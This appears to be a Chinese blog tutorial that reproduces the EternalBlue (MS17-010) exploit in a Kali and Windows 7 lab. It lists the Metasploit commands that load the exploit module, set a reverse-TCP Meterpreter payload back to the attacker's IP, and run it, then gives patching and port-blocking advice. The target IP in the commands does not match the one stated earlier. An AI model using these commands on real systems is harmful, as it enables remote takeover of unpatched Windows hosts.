前言:
因为疫情在家待着无所事事突然想起来一个很经典的漏洞-->永恒之蓝 就用msf工具复现了下。
下面是永恒之蓝简介 选自百度百科
看到了吧 可以获取Windows系统的最高权限,也就是获得对方主机的控制权
准备工作:
Kali 虚拟机 IP:192.168.159.132
Windows7 虚拟机(靶机) IP:192.168.159.129
靶机需要开放445端口
gogogo 现在开始复现
Kal打开终端输入msfconsole以进入msf工具
如下图所示
Ps每次进入后显示的图案都是随机生成的,
这图案满满的666感觉把
我们先进行扫描以确定对方主机是否可以执行
若知道的话可以直接略过
按顺序输入:
#中间的是注释内容帮助理解命令的#
现在扫描完成了可以进行利用(有绿色的+号说明可以)
下面就是开始利用也是就是入侵的时候了
几行命令 让你拥有对方电脑权限:
use exploit/windows/smb/ms17_010_eternalblue
#使用这个模块#
set payload windows/x64/meterpreter
/reverse_tcp
#设置攻击负荷#
set rhosts 192.168.192.129
#设置靶机的ip#
set lhost 192.168.159.132
#自己的ip地址#
set lport 443
#设置监听的端口为443#
exploit
#执行命令#
到了这里 我们已经成功的提获了对方主机权限了,可以对对方主机进行任意操作
Ps:
如果遇到了乱码 请修改终端编码格式为gbk
在终端的编码设置里可以进行修改
那么如何预防这个漏洞呢:
关闭443 445端口 关了端口相当于关了漏洞进入的大门
方法如下:
控制面板 -防火墙 高级设置-入站规则-tcp端口
选择特定本地端口 445,443 -阻止连接-然后名称设置为关闭443 445即可。
或者是安装微软官方出的MS17-010补丁。
此漏洞最新的Windows10免疫。
本文到这里就结束了,如果对此感兴趣的可以照着文章实验下。
切勿用于非法用途。